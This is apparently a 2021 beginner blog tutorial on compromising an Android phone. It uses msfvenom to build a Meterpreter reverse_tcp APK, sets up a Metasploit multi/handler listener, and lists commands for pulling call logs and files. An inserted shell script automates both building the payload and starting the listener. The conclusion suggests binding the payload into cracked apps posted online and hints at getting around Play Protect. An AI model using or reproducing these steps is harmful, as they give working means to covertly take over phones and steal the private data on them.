How to hack any Android Device?

The Beginners Way

Sumanth Dodda
5 min read · Jun 19, 2021

There are many ways to hack an Android device, and many kinds of malware that can gain access to one: commercial spyware apps such as spyzier (GitHub), or attacker code bound into a well-known app and released online as a cracked version or mod.

As a beginner, we will create a small apk (the payload), install it on a device in our local network environment (i.e. within the same Wi-Fi network), and cover the basic usage of Metasploit, a powerful framework used by cybercriminals as well as ethical hackers to probe for vulnerabilities in networks and servers.

Tools required:

  • An Android device (on the same Wi-Fi network as the attacker machine)
  • Metasploit Framework (preinstalled in Kali Linux)

Step 1: Generate a payload

The framework ships with its own payload generator, msfvenom, so we will use:

msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Port Number> R > cybermight.apk

Here the attacker machine's IP address is 192.168.1.5.

Here we configure the payload to connect back using the reverse TCP method: as soon as the victim installs and opens the apk, the device connects out to the attacker and we get a command-and-control shell. For that we need a listener on the attacker machine. LHOST and LPORT are the listener's address and port, and the listener must already be running and waiting for incoming connections before the victim opens the app, because the payload only connects out at the moment it is launched.

The ls command confirms that a file called “cybermight.apk” has been created.

• -p: the payload type (several payloads can create a reverse connection, but reverse_tcp is the most reliable and the best known)
• LHOST: the listener address, i.e. the attacker's IP address
• LPORT: the listening port number (any free port)
• R: raw format, which for Android payloads is the apk itself
• > <filename>.apk: where to save the payload

Step 2: Configuring our listener

We will use the Metasploit framework to listen for incoming connections; the command msfconsole starts the framework.

You can list the Android modules available in Metasploit by typing “search android”.

In that listing, the payload we will use, android/meterpreter/reverse_tcp, appears as number 20 in my output. The index depends on your Metasploit version, so select the payload by its full name rather than by number.

Type in the following commands; they are explained below.

  • use exploit/multi/handler
  • set payload android/meterpreter/reverse_tcp
  • set LHOST <ip address given> [set LHOST 192.168.1.5]
  • set LPORT <port number given> [set LPORT 1906]
  • show options
  • exploit

exploit/multi/handler is a generic handler module: it catches connections from payloads launched outside the framework, in our case the apk running on the phone. set payload tells it which payload to expect, LHOST and LPORT are the address and port it will listen on, show options prints a summary of the configuration so you can check it, and exploit starts the listener right away. One check worth making here: LHOST must be the attacker machine's own address on the Wi-Fi network, the same value passed to msfvenom, not the phone's address.

Listener started
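Steps 1 and 2 together, as an added example that is not code from the original post: a small POSIX shell script that validates LHOST and LPORT, generates the apk with msfvenom, writes the Step 2 handler commands to a Metasploit resource script and starts msfconsole with it. It assumes msfvenom and msfconsole are on PATH (as on Kali); the script name build_and_listen.sh, the file handler.rc and the function names are my own, and the defaults 192.168.1.5 and 1906 are the values used in this post. It adds two settings the post does not use: ExitOnSession false, so the handler keeps listening after the first session, and exploit -j, which runs the handler as a background job so the console prompt stays usable.

```shell
#!/bin/sh
# Added example (not code from the original post): Step 1 and Step 2 in one
# script. Generates the apk with msfvenom, writes the handler commands from
# Step 2 to a Metasploit resource script and starts msfconsole with it.
# Assumptions: msfvenom and msfconsole are on PATH (Kali); the defaults
# 192.168.1.5 and 1906 are the values used in the post.
# Run: sh build_and_listen.sh 192.168.1.5 1906 cybermight.apk

# Reject anything that is not a dotted quad with octets 0-255. This catches
# the common mistake of typing the phone's address or a copy-paste stray
# character where the listener's own address belongs.
valid_ipv4() {
  ip=$1
  case "$ip" in
    *[!0-9.]*|*..*|.*|*.|*.*.*.*.*) return 1 ;;
    *.*.*.*) ;;
    *) return 1 ;;
  esac
  old_ifs=$IFS
  IFS=.
  set -- $ip
  IFS=$old_ifs
  for octet in "$@"; do
    [ "${#octet}" -le 3 ] && [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# A port is a number in 1-65535.
valid_port() {
  case "$1" in
    ''|*[!0-9]*) return 1 ;;
  esac
  [ "${#1}" -le 5 ] && [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Emit the handler configuration from Step 2 as a Metasploit resource script.
# ExitOnSession false keeps the handler listening after the first phone
# connects; "exploit -j" runs it as a background job so the console prompt
# stays free for "sessions -i <id>".
handler_rc() {
  cat <<EOF
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST $1
set LPORT $2
set ExitOnSession false
exploit -j
EOF
}

# Validate, build the apk, write handler.rc and start the listener.
build_and_listen() {
  lhost=$1
  lport=$2
  apk=${3:-cybermight.apk}
  valid_ipv4 "$lhost" || { echo "LHOST must be an IPv4 address, got: $lhost" >&2; return 1; }
  valid_port "$lport" || { echo "LPORT must be 1-65535, got: $lport" >&2; return 1; }
  # Same payload as the post; -o writes the apk directly instead of "R > file".
  msfvenom -p android/meterpreter/reverse_tcp LHOST="$lhost" LPORT="$lport" -o "$apk"
  ls -l "$apk"
  handler_rc "$lhost" "$lport" > handler.rc
  # -q skips the banner, -r runs the resource script, then leaves you at the prompt.
  msfconsole -q -r handler.rc
}

# With no arguments the script only defines the functions above.
if [ "$#" -gt 0 ]; then
  build_and_listen "$@"
fi
```

Run it as sh build_and_listen.sh 192.168.1.5 1906 cybermight.apk; once the phone connects, the backgrounded handler prints the new session id and you attach to it with sessions -i 1 at the msfconsole prompt.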

Step 3: Installation of payload

I copied the apk to my own device manually and installed it.

You may see a warning like the one below, and possibly a message that malicious activity or a known signature was found; we come back to this later. For now, tap Install anyway.

After installation you will see an app called “Main Activity” on your home screen.

As soon as you open it, it asks for a set of permissions, as shown here. After you allow them the app closes automatically and does not respond to any further input.

Step 4: Listener Session

Meanwhile, on the attacker machine, a reverse shell (a Meterpreter session) has opened, through which the attacker controls the device.

The phone's IP address is 192.168.1.3.

The help command lists the Meterpreter commands available; from this CLI you can gather some serious information.

Examples:

  • sysinfo: dumps the architecture and OS information of the device
  • dump_calllog: fetches all call logs and saves them locally on the attacker PC
  • ls: lists the files in the current directory on the Android device

Blocked By Play Protect

This is the point where one has to learn how the detection works and how to get past it. To bypass it we need to sign the apk, and there are many tools for this, but note that Play Protect flags the stock msfvenom apk because both its code and its default signing certificate are well known, so re-signing changes the certificate but not the payload code it recognizes. I am leaving this part to you: try to understand how and why it works, and also how such an attack would be performed from outside the local network.

Conclusion

As discussed, one can bind this payload into a well-known working application and host the apk online as a cracked version. The same basic process applies to Windows, Linux and other targets; the details vary (for a Windows machine you generate a .exe payload instead), but the idea stays the same. Metasploit is a great tool that can also deliver serious attacks against unpatched servers, and the whole process described here can be automated with GitHub scripts such as TheFatRat and many more, but learning how and why it works is still a must.

Note: For Educational Purposes Only

Thanks,

Cybermight

Do follow on Instagram for more content
